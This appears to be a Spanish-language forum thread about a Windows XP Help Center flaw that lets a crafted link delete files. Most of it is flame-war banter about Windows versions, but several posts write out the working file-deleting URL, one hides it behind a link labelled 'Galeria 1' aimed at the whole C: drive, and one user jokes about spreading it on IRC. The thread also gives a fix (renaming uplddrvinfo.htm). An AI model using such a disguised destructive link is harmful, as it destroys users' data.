Nuevo agujero de seguridad grave en Windows XP

Un nuevo agujero de seguridad ha sido descubierto en Windows XP, mediante el cual puede borrarse cualquier archivo del disco duro a través de un simple link (de una página web, un correo electrónico en formato html, etc.). Los detalles de cómo construir el enlace malicioso no han sido publicados debido a su gravedad y la facilidad con la que podría hacerse, y aunque Microsoft lo conocía desde hace tiempo el único parche para solucionarlo está incluído en el nuevo SP1. En esta página se explica cómo poder reaccionar frente al ataque y también una manera simple de solucionar el problema sin tener que instalar el SP1.
Cuando estas noticias empiecen a parecerme novedosas...

Un saludo!

Mangafan
Esto es un agujero de seguridad, lo demás con tonterias XD

Salu2
Madre mia, esto no es un Bug, es una comunidad entera, joder, vaya mierda de seguridad k tiene el Win XP xDDD

menos mal k yo sigo (y seguire) con mi Win 2000 a capa y espada sin SP3 xDD

desdeluego, estos de MS pami k lo hacen aposta ratataaaa ratataaaa eske es imposible ser taaaaaaaaaaan pakete. [+furioso]

un saludo.
Es que es eso, realmente son tan malos? O lo hacen para que la gente tenga que actualizarse sus windows a su antojo -el de ms- con los parches y otras cositas incorporadas...

También puede ser que el propio Win32 en toda su esencia sea una mierda.

O también puede ser que, obsesionados por proteger el código fuente de posibles fugas, no haya casi nadie con acceso total a la totalidad del código fuente, y por eso se produzcan tantos agujeros..

De entrada lo que está claro es que simlemente por el número de personas que tienen acceso al código, es mucho más normal que sean más seguros Linux, *BSD y comapañía que el Teletubbie XP

a saber

salu2
Escrito originalmente por Briareos_H
Es que es eso, realmente son tan malos? O lo hacen para que la gente tenga que actualizarse sus windows a su antojo -el de ms- con los parches y otras cositas incorporadas...

También puede ser que el propio Win32 en toda su esencia sea una mierda.

O también puede ser que, obsesionados por proteger el código fuente de posibles fugas, no haya casi nadie con acceso total a la totalidad del código fuente, y por eso se produzcan tantos agujeros..

Seguramente sean las 3 kosas,ke algunos los agan pa ke la gente se tire de kabeza a los services packs, i luego el ke no ta bien informao senkuentra kon su flamante i pirata winxp desactivado.Aparte, sq el win32 en si mismo es una verdadera mierda o parece ke ni tan sikiera mikrosoft sabe usarlo.
Ademas de ke mui pokos de sus trabajadores tengan acceso, ia sabes ke los activex i demas movidas de mikrosoft siempre an tenido mucha kalidad, muchos xploits i demas....

Vamos, simple i llanamente WINDOWS
pos pami ke lo azen aposta pa ke la peña tenga ke pillarse las actualizaziones y asi azerse 1 poko mas rikos a nuestra kosta.


[buaaj] [buaaj] [buaaj] [buaaj] [buaaj] [buaaj] [buaaj] [buaaj]
Si macho, rico a tu costa y a la mia. Con un SO pirata que cada vez que te conectas al windows update para bajarte parches consume ancho de banda que les cuesta dinero. Ricos perdios a nuestra costa vamos.

La pasta de microsoft viene por otros caminos.
Estoy casado de decir que el Xp es la mierda mas grade jama conocidad, ahora esto va para todo aquello que me odia aqui tenies mi recopesa , desde tanta vece de decir que XP es una mierda y lo mas inseguro ya no lo digo yo solo , por lo que bueno esta noche dormire FELIZ ...




UN SALUDO FUNK Y ZEUII POR TOCAME LOS COJONE QUE NO AHORA TENEIS QUE ESTA CALLADITO Y BIEN CALLADITO ....


PD: SE QUE EN FONDO ME QUEREIS PERO COMO YO NO OS DEJO OS AGUANTAIS JAJAJAJA


SOY LA PERSONA MAS FELIZ DEL MUNDO JAAJA AHI SEGUI CON EL XP YO SEGUIRE CON MI MARAVILLOSO WIN2K...


AHI UN REFRA QUE ME A SERVIDO DICE QUE EL QUE RIE ULTIMO RIE MEJOR PUES ME PASA ESO JAJAJAJAJAJAJAJAJA....
Tan solo queda decir...



¿OTRO MÁS?



Salu2
¿"agujero"? Jode, eso es todo un tunel!
¿Alguien quiere más motivos para quitar el windoze de las administraciones públicas? [666]
Escrito originalmente por Toba
Estoy casado de decir que el Xp es la mierda mas grade jama conocidad, ahora esto va para todo aquello que me odia aqui tenies mi recopesa , desde tanta vece de decir que XP es una mierda y lo mas inseguro ya no lo digo yo solo , por lo que bueno esta noche dormire FELIZ ...




UN SALUDO FUNK Y ZEUII POR TOCAME LOS COJONE QUE NO AHORA TENEIS QUE ESTA CALLADITO Y BIEN CALLADITO ....


PD: SE QUE EN FONDO ME QUEREIS PERO COMO YO NO OS DEJO OS AGUANTAIS JAJAJAJA


SOY LA PERSONA MAS FELIZ DEL MUNDO JAAJA AHI SEGUI CON EL XP YO SEGUIRE CON MI MARAVILLOSO WIN2K...


AHI UN REFRA QUE ME A SERVIDO DICE QUE EL QUE RIE ULTIMO RIE MEJOR PUES ME PASA ESO JAJAJAJAJAJAJAJAJA....



Demuestras todo lo q sabiamos de ti en todas estas lineas jejejeje....


Y ese agujero es de XP solo no? al w2k no le afecta no? [666]


Q poca cosa eres :D
ah por cierto, dejate de ilusiones y de q toco nada ,q eso tus ojos tras tus gafas de culo botella en su vida veran


Q por cierto, todo lo q se ha reido de TI EOL no hay refran q lo deshaga XD
Otro listo, eh TOBA, que el W2k y el XP son la misma mierda pero con diferente collar.

Y yo uso el XP, pero la semana que viene me instalo el QNX, que ya de joder el ordenata lo jodo yo mismo sin virus ninguno.
Escrito originalmente por Toba
Estoy casado de decir que el Xp es la mierda mas grade jama conocidad, ahora esto va para todo aquello que me odia aqui tenies mi recopesa , desde tanta vece de decir que XP es una mierda y lo mas inseguro ya no lo digo yo solo , por lo que bueno esta noche dormire FELIZ ...




UN SALUDO FUNK Y ZEUII POR TOCAME LOS COJONE QUE NO AHORA TENEIS QUE ESTA CALLADITO Y BIEN CALLADITO ....


PD: SE QUE EN FONDO ME QUEREIS PERO COMO YO NO OS DEJO OS AGUANTAIS JAJAJAJA


SOY LA PERSONA MAS FELIZ DEL MUNDO JAAJA AHI SEGUI CON EL XP YO SEGUIRE CON MI MARAVILLOSO WIN2K...


AHI UN REFRA QUE ME A SERVIDO DICE QUE EL QUE RIE ULTIMO RIE MEJOR PUES ME PASA ESO JAJAJAJAJAJAJAJAJA....


[+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] [+risas] me he reido mas que con tu hilo de flamewars. Si te sientes feliz por eso pues......
Este es un ejemplo del bug, espero que no moleste a nadie ...

Podeis crear una carpeta con el nombre "TEST" dentro de c y alli dentro poned fixeros inutiles y vereis que el algodon no engaña :D

[url]http://system/DFS/uplddrvinfo.htm?file://c:\test\*[/url]
Dos cosas, es [url]http://[/url] :D


y segundo, w2k con SP3, me ha follao todo lo q habia en la carpeta test....asi que....como era el refran ese? "el q rie ultimo rie mejor?" :O



NetVicious que se q leeras este hilo, ahora el mozilla, en vez de blanco el fondo de respuesta, ahora en lo "tipico", amarillo/marron.....



Saludos
Vaya putada, imaginaros si cambias la carpeta test por la del sistema XD

Salu2

P.D: Win98 es inmune al bug
Me he quedado alucinado, vaya "boquete" mas tonto, hasta un funcionario de correos podria utilizarlo [looco] Lo dicho, muchas gracias por la noticia. Acojona ver q un SO tiene fallos asi, estoy sin palabras.

Para alguno q hay por ahi, q respete a los q usan XP o lo q sea, si ademas dijese q usa linux, macOS o algo q no tuviese que ver... se podria cachondear con mas saña, pero es q encima usa el Win2k, que es el hermano del XP vamos.

Puedo unirme a la demanda de california de la otra noticia?? Es q si me vendiesen un coche con un fallo en el q al usar la radio y el mechero a la vez, me quedase sin frenos... los llevaria a la carcel. Para particulares el perjuicio es bastante, pero es q para una empresa es vital. Amigo gates, q desperdicio, q futuro tendrias en una churreria. [agggtt] [toctoc]
He probado ese link, y no me borra nada de la carpeta test....

Es mas, he probadoa ponerla en toas las particiones porsiacaso, y no a tocado nada...
Tengo la version corp recien instalada.... ¿Está bien ese "link" del bug?

Salu2
asi lo has puesto en el navegador???



[url]http://system/DFS/uplddrvinfo.htm?file://c:\test\*[/url]




Si es asi y no te ha borrado nada, pos como q flipo.....


doy por echo q has creado la carpeta C:\test :D
yo tengo el w200 con el sp2 y no me lo ha borrado.

(no tengo un sp mayor porque mi makina es del curro y los sp se instalan cuando estan MUUYY probado que no les den problemas con otras aplicaciones .. y aun asi les dan....
si os contara los problemas que tienen lo companyeros porque la gente le dejan de ir los programas por actualizarse los SP del windows o del explorer....
Pues yo con Win2K SP3 tampoco me lo chafa [comor?] igual es por el firewall, pero hay sigue la carpeta con todos los archivos falsos dentro...
Escrito originalmente por mcklain
La pasta de microsoft viene por otros caminos.
No creas, entre Windows y el Office saca la gran mayoría de la pasta que tiene ya que lo compran mogollón de empresas y grandes instituciones con unos packs de licencias a precio de oro.
Con el Mozilla no rula así que sin problemas si lo usais en Windows.
Escrito originalmente por Toba
SOY LA PERSONA MAS FELIZ DEL MUNDO JAAJA AHI SEGUI CON EL XP YO SEGUIRE CON MI MARAVILLOSO WIN2K...

Pero tu no eras un juaker que sólo usaba Linux ??? [carcajad]
Ahora mismo en Win2000 + SP2 con Mozilla y con IE6.0 tampoco borra nada...
A mi tampoco me ha borrado nada.
Pues a mi tampoco me borra nada de la carpeta C:\test (he metido un fichero zip y uno doc). Tengo el windows xp, I.E. 6.0 y
el Zone Alarm pro. [Alaa!]
pues a mi me lo borra (winxp pro, sin firewall)
aqui esta la prueva ^_^ hay que cambiar una cosita para que vaya
Yo ya lo puse bien, puse HCP pero alguien me dijo que no era asi, q era HTTP y edite el post, puesto q yo uso win98, pero como he visto en el video de ruben realmente funciona ...


Un ejemplo de lo q podrian usar en una pagina web con el codigo maligno.

ATENCION !!!!!!!!! NO PULSEIS ENCIMA EL VINCULO LOS USUARIOS DE WINDOWS XP O SINO OS BORRARA LA C:\ :D :D :D :D

-PRUEBA - NO PULSAR - PRUEBA - NO PULSAR - PRUEBA -
-----------------------------------------------------------------------
[url=SINESTOhps://system/DFS/uplddrvinfo.htm?file://c:\*]Galeria 1[/url]
-----------------------------------------------------------------------
-PRUEBA - NO PULSAR - PRUEBA - NO PULSAR - PRUEBA -
Pues nada, a hacer lo que dice la web de vsantivirus

Abrir en el Explorador la carpeta:

C:\WINDOWS\PCHEALTH\HELPCTR\System\DFS

Ahí pillar el ficherito uplddrvinfo.htm y o bien sus lo cepillais [toctoc] o bien lo renombrais.
Yo sigo pensando lo mismo, Windows Me para juegos, Linux Mandrake de S.O. profesional y Disco de Arranque de ms-dos para juegos muy viejos. Y con esto tengo y me sobra, no me hace falta ni XP ni NT ni 2000 ni nada más.
En mi peazo win2k sin SP no me ha borrado nada...

el SP3 no lo instalo ni de coña

el SP2 si k lo instalaria pero me dio problemas la ultima vez y lo mande a tomar porculo


un saludo
Escrito originalmente por BGM THE HACK

ATENCION !!!!!!!!! NO PULSEIS ENCIMA EL VINCULO LOS USUARIOS DE WINDOWS XP O SINO OS BORRARA LA C:\ :D :D :D :D

-PRUEBA - NO PULSAR - PRUEBA - NO PULSAR - PRUEBA -
-----------------------------------------------------------------------
[url=SINESTOhps://system/DFS/uplddrvinfo.htm?file://c:\*]Galeria 1[/url]
-----------------------------------------------------------------------
-PRUEBA - NO PULSAR - PRUEBA - NO PULSAR - PRUEBA -


Te importa si te copio el link y empiezo a ponerlo por todo el IRC? X-D
Escrito originalmente por JrS-76
Yo sigo pensando lo mismo, Windows Me para juegos, Linux Mandrake de S.O. profesional y Disco de Arranque de ms-dos para juegos muy viejos. Y con esto tengo y me sobra, no me hace falta ni XP ni NT ni 2000 ni nada más.

pfff, antes que el ME prefiero un 98. Windows o 98 o 2000 o XP pero el MErdenium ni se te ocurra.

En cuanto a lo de Mandrake SO profesional no se que decirte no se [666]
Pos ná de ná...
Uso la version corp con el SP1.... (el sp1 dsd hace 3 minutos.. :P )
Con IE 6 y con todo archivos inutiles en c:/test
Y nada... será por ser la corp?


Salu2
Ajá
Creo q ya se pq es....
Tngo instalado win me en c: y winxp en e: ( D: se la comio con patatas... ) supongo q será por eso, o por ser la corp...



Salu2
No creo que sea por la partición, seguramente M$ se habrá "olvidado" de meter ese parchecito en el SP1 Español, así que meterle mano al ficherito culpable renombrandolo o borrandolo y así menos problemas.
En grc.com han sacado un sencillo programita que realiza la tarea fácilmente, bastante útil para pasar a esos amigos que no tienen mucha idea de ordenadores ;)

http://grc.com/xpdite/xpdite.htm

Download aki -> http://grc.com/files/XPdite.exe
Una pregunta.

Me he instalado el sp1 castellano, i me ha aumentado el espacio en el HD, 2 gigas. Es normal?

Le dije que me hiziera un backup de esos de restaurar cuando me lo intalo, i lo puso en un directório que no encuentro, sabeis como puedo borrar ese backup?, porque quiza sea eso.

Saludos.
Por lo que he escuchado creo que si tio... ahi un colega que me lo comento , no se qu chaca te metera en el Hd paa que aga eso pero yo no me fiaria mucho...


un saludo
Para fiarte de algo, tienes q tener conocimientos de algo primero, y en tu caso eso es algo dado ya por imposible




PD Posteas ya el CD de ya.com con los drivers de linux, querido Toba? o es otra de tus TANTAS majaderias?
42 respuestas